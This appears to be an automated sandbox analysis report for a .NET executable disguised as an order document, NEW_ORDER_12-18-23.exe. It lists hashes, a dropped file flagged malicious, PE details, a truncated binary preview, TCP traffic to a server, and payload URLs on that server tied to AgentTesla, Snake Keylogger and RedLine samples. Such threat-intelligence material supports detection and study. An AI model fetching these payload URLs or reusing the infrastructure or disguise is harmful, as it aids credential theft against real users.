                                        paymentcopy-pdf__________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                        • 45.137.22.163/Wmdmjhtr_Pendcahw.bmp
                                        Paymentcopy-pdf___________________________________.exeGet hashmaliciousAgentTeslaBrowse
                                        • 45.137.22.163/Dhjuzchby_Xwgoflwi.bmp
                                        AIR CARGO BOARDING shipment MAWB 40608657504.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 45.137.22.163/Ejghs_Imuzrnrb.png
                                        PI- PI04522748-pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 45.137.22.163/Cpogmqp_Qhkfesil.jpg
                                        Ordine di acquisto PO-JTT-00001018.exeGet hashmaliciousSnake KeyloggerBrowse
                                        • 45.137.22.163/Htrcekszm_Kcdcxrzw.jpg

                                        Domains

                                        No context

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        ROOTLAYERNETNLPAYMENT_TT_COPY.pdf.exeGet hashmaliciousRedLineBrowse
                                        • 185.222.58.239
                                        SecuriteInfo.com.MSIL.Generik.FMUPQYX.tr.3045.24667.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 45.137.22.163
                                        cVw2fI6l0l.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                        • 45.137.21.8
                                        D4CJJrRyRV.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoader, XmrigBrowse
                                        • 45.137.21.8
                                        C2qEwpO6ff.exeGet hashmaliciousGlupteba, LummaC Stealer, Petite Virus, PureLog Stealer, RedLine, SmokeLoader, XmrigBrowse
                                        • 45.137.21.8
                                        rQ7KS66xHz.exeGet hashmaliciousGlupteba, PureLog Stealer, RedLine, SmokeLoader, XmrigBrowse
                                        • 45.137.21.8
                                        cgROS79PO8.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoader, XmrigBrowse
                                        • 45.137.21.8
                                        GQmlDdfIus.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoader, XmrigBrowse
                                        • 45.137.21.8
                                        tFXV5OO73i.exeGet hashmaliciousGlupteba, PureLog Stealer, RedLine, SmokeLoader, XmrigBrowse
                                        • 45.137.21.8
                                        xR0Sb2wGy9.exeGet hashmaliciousRedLineBrowse
                                        • 185.222.58.99
                                        rdU3cg9xmI.exeGet hashmaliciousGlupteba, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader, XmrigBrowse
                                        • 45.137.21.8
                                        Dzc2otu6qd.exeGet hashmaliciousGlupteba, LummaC Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, XmrigBrowse
                                        • 45.137.21.8
                                        YRdCIU1WYM.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                        • 45.137.21.8
                                        ae6r1Pwu4b.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoader, XmrigBrowse
                                        • 45.137.21.8
                                        8d6f8324030f8c1566ab38f8ade3c386b7b7740ccaf28.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                        • 45.137.21.8
                                        e6Ebnpst2H.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoader, XmrigBrowse
                                        • 45.137.21.8
                                        C2Q2uZGYEJ.exeGet hashmaliciousLummaC Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                        • 45.137.21.8
                                        O67RAr74KS.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                        • 45.137.21.8
                                        HVT3sNz081.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                        • 45.137.21.8
                                        hZQc10Oucb.exeGet hashmaliciousPrivateLoader, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                        • 45.137.21.8

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NEW_ORDER_12-18-23.exe.log

                                        Download File
                                        Process:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        File Type:CSV text
                                        Category:dropped
                                        Size (bytes):1492
                                        Entropy (8bit):5.3787668257697945
                                        Encrypted:false
                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNt1qE4GIs0E4KVE4kh:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIx
                                        MD5:E6AD1A632B3ED1855D07C71585EE32C3
                                        SHA1:D44EC2568001E1B1492B86681211788246A55ADD
                                        SHA-256:CA2883CA6638072E9A3E8A455CFD1C5D7903EEF606924F06E90C2F474751E88D
                                        SHA-512:B09AD19DB449687B3BB91CA8E97E553AB7CBC1B5323D920F75D0CC930FBF1637CB1087170AD00E34677D29A9EBDA5F9A96A4AA1C736C7AC1C24A70DFB4A215D0
                                        Malicious:false
                                        Reputation:low
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\spof.exe.log

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\spof.exe
                                        File Type:CSV text
                                        Category:dropped
                                        Size (bytes):1492
                                        Entropy (8bit):5.3787668257697945
                                        Encrypted:false
                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNt1qE4GIs0E4KVE4kh:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIx
                                        MD5:E6AD1A632B3ED1855D07C71585EE32C3
                                        SHA1:D44EC2568001E1B1492B86681211788246A55ADD
                                        SHA-256:CA2883CA6638072E9A3E8A455CFD1C5D7903EEF606924F06E90C2F474751E88D
                                        SHA-512:B09AD19DB449687B3BB91CA8E97E553AB7CBC1B5323D920F75D0CC930FBF1637CB1087170AD00E34677D29A9EBDA5F9A96A4AA1C736C7AC1C24A70DFB4A215D0
                                        Malicious:false
                                        Reputation:low
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

                                        C:\Users\user\AppData\Roaming\spof.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):17408
                                        Entropy (8bit):5.634321804413825
                                        Encrypted:false
                                        SSDEEP:384:xlNEv0rnlMTxHqigW5R4+kon45b9b5LkkxHYAscjEl:av8gR4+kvpbgcYl
                                        MD5:70FAC030623DEB6181201FD0CA321BB4
                                        SHA1:F76FA53071642B4AF732B2388408A8C8B8AD15F3
                                        SHA-256:CFC1CD526A745E9154CDA0C23F0CCE1999EC4325AF86FC79D3B1072631B17329
                                        SHA-512:BC6227E5596436BBB3CA611E87603600CAE98C243ADFB48D831BD8B8269EB105220CD863FB5AA3E8F287B8EC0795A6EAD5EE552348E7764E5014C13A808225F9
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 27%
                                        • Antivirus: Virustotal, Detection: 35%, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......e.................:...........X... ....@...... ....................................`...@......@............... ......................xX..W....`.. ............................................................................ ............... ..H............text....8... ...:.................. ..`.rsrc... ....`.......<..............@..@.reloc...............B..............@..B.X......H.......4=..D.......-....<...............................................0.. ........-.s....z..i,........*.........*.0..s....... ...... .7.qa.s.............s........Y....o...........-.s.............o....... ..i.X.Xffeeffefefe ?..v.Y.Yffeeffefeefa...-..+...o........,... e.|a.Xffeefeffefea...-..+...o.........:...(....(....,..~....`...... .+.p.X.a.Xa.8.......(....,T....(....,&~......`...... .fe..a.Xfeffeefef.Ya.+G.~....`...... j....Y.Yfefeffeefa.+$..~....`....... .Y[vX.Xfefefef

                                        C:\Users\user\AppData\Roaming\spof.exe:Zone.Identifier

                                        Download File
                                        Process:C:\Users\user\Desktop\NEW_ORDER_12-18-23.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:false
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

                                        File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):5.634321804413825
                                        TrID:
                                        • Win64 Executable GUI Net Framework (217006/5) 47.53%
                                        • Win64 Executable GUI (202006/5) 44.25%
                                        • Win64 Executable (generic) Net Framework (21505/4) 4.71%
                                        • Win64 Executable (generic) (12005/4) 2.63%
                                        • Generic Win/DOS Executable (2004/3) 0.44%
                                        File name:NEW_ORDER_12-18-23.exe
                                        File size:17'408 bytes
                                        MD5:70fac030623deb6181201fd0ca321bb4
                                        SHA1:f76fa53071642b4af732b2388408a8c8b8ad15f3
                                        SHA256:cfc1cd526a745e9154cda0c23f0cce1999ec4325af86fc79d3b1072631b17329
                                        SHA512:bc6227e5596436bbb3ca611e87603600cae98c243adfb48d831bd8b8269eb105220cd863fb5aa3e8f287b8ec0795a6ead5ee552348e7764e5014c13a808225f9
                                        SSDEEP:384:xlNEv0rnlMTxHqigW5R4+kon45b9b5LkkxHYAscjEl:av8gR4+kvpbgcYl
                                        TLSH:BD7219087E9DA223C5AC167C98F317050375DA3FB982E38BADDC9BA62D837C015516F6
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......e.................:...........X... ....@...... ....................................`...@......@............... .....

                                        File Icon

                                        Icon Hash:90cececece8e8eb0

                                        Static PE Info

                                        General

                                        Entrypoint:0x4058d2
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x657FF8CD [Mon Dec 18 07:46:21 2023 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        dec eax
                                        mov eax, dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        jmp eax
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x58780x57.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x520.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x38de0x3a00False0.5376481681034483data5.847776237239097IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0x60000x5200x600False0.3938802083333333data4.50071935327843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x80000xc0x200False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_VERSION0x60a00x2ccdata0.43435754189944137
                                        RT_MANIFEST0x636c0x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators0.5642201834862385

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 18, 2023 14:31:03.500489950 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:03.736928940 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:03.737123013 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:03.739526987 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:04.294747114 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:04.534419060 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:04.534451962 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:04.534463882 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:04.534478903 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:04.534492970 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:04.534570932 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:04.534615040 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:04.771440029 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:04.771472931 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:04.771519899 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:04.771574974 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:04.771600008 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:04.771647930 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:04.771680117 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:04.771745920 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:04.771786928 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:04.771789074 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:04.771866083 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:04.771883011 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:04.771908045 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.007777929 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.007869959 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.007955074 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.007966042 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.008048058 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.008095980 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.008121014 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.008188963 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.008270979 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.008318901 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.008378029 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.008465052 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.008508921 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.008531094 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.008599043 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.008644104 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.008656025 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.008733034 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.008744001 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.008776903 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.008824110 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.008904934 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.008946896 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.008963108 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.008985043 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.009005070 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.009026051 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.244440079 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.244456053 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.244502068 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.244553089 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.244559050 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.244565964 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.244605064 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.244657040 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.244749069 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.244807959 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.244822979 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.244978905 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.245016098 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.245026112 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.245083094 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.245163918 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.245215893 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.245235920 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.245340109 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.245349884 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.245385885 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.245415926 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.245511055 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.245558023 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.245573997 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.245666027 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.245708942 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.245748043 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.245821953 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.245873928 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.245904922 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.245981932 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.246023893 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.246025085 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.246076107 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.246123075 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.246128082 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.246200085 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.246210098 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.246256113 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.246272087 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.246323109 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.246364117 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.246424913 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.246473074 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.246512890 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.246568918 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.246762991 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.246809959 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.246871948 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.246932983 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.246984005 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.246992111 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.480988979 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481024981 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481045008 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481064081 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481081009 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.481085062 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481097937 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481111050 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481113911 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.481123924 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481142044 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.481142998 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481175900 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.481190920 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481209040 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481220961 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481234074 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481256008 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.481281996 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481285095 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.481337070 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481352091 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481364965 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481381893 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481390953 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.481406927 CET4972980192.168.2.445.137.22.163
                                        Dec 18, 2023 14:31:05.481457949 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481518984 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481558084 CET804972945.137.22.163192.168.2.4
                                        Dec 18, 2023 14:31:05.481571913 CET4972980192.168.2.445.137.22.163
